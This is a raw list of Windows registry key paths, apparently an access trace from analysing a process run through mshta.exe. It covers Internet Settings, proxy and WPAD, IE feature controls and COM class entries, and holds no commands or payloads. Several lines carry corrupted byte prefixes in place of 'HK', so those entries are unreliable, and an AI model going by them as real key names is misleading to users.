HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
\xede8\x9cEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
\x8e08]EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
\x8e08]EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
\xe018]EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
\xe018]EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\x8e08]EY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings
\x8e08]EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\http\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\*\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Pre Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Pre Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_URLMON_IQDA_SIZE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_URLMON_IQDA_SIZE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_USE_BUILTIN_ACCEPT_HEADERS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_USE_BUILTIN_ACCEPT_HEADERS
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\UrlMon Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableUTF8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Control Panel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Control Panel
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Control Panel\UTF8URLQuery
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Control Panel
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\BrowserStorage\AppCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\BrowserStorage\AppCache
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserStorage\AppCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\BrowserStorage\AppCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\msHta.Exe
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\EnableAnchorContext
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_CLASSES_ROOT\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{332C4425-26CB-11D0-B483-00C04FD90119}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{332C4425-26CB-11D0-B483-00C04FD90119}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{332C4425-26CB-11D0-B483-00C04FD90119}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020424-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{332C4425-26CB-11D0-B483-00C04FD90119}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_CURRENT_USER\Software\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\52-54-00-6f-d4-05
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadNetworkName
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Linkage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Linkage\Export
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters
